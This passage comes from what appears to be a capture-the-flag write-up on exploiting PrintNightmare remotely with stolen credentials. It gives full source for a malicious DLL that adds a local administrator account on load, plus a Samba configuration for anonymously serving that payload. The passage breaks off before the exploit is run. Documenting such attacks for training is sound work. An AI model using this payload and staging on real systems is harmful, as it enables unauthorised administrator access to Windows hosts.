Cube0x0’s exploit for PrintNightmare works remotely with creds. First, I’ll need to build a Dll. I’ve walked through this in detail before for HackBack. I’ll follow a similar set of steps to create a C++ DLL project, and use the following source for my Dll:
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("cmd.exe /c net user 0xdf 0xdf0xdf /add");
system("cmd.exe /c net localgroup administrators 0xdf /add");
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
The DllMain function will be called for various reasons, one of which is when a process loads the DLL. In that case, the ul_reason_for_call will be DLL_PROCESS_ATTACH. So the DLL will be loaded, will execute these two system commands, and then be done. I’ll compile that and copy it back to my Parrot VM.
Samba
Cube0x0 has an example Samba config to allow for anonymous access on his GitHub page. It’s important that the user on the last line exists on your host. I updated mine to match a user I had configured with access to nothing.
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[share]
comment = Samba
path = /srv/smb/
guest ok = yes
read only = no
browsable = yes
force user = nobody
I’ll restart Samba to take the updated config:
sudo service smbd restart
It’s also important that that user can read from the SMB share, so I’ll set that directory to be owned by that user:
To avoid messing up my system install, I’ll create a virtual environment, activate it, and install Impacket in there.
Run Exploit
With all the pieces assembled, I can run the exploit. I’ll give it the creds for the hazard user which work for an RPC connection, as well as the path to the DLL on the SMB share: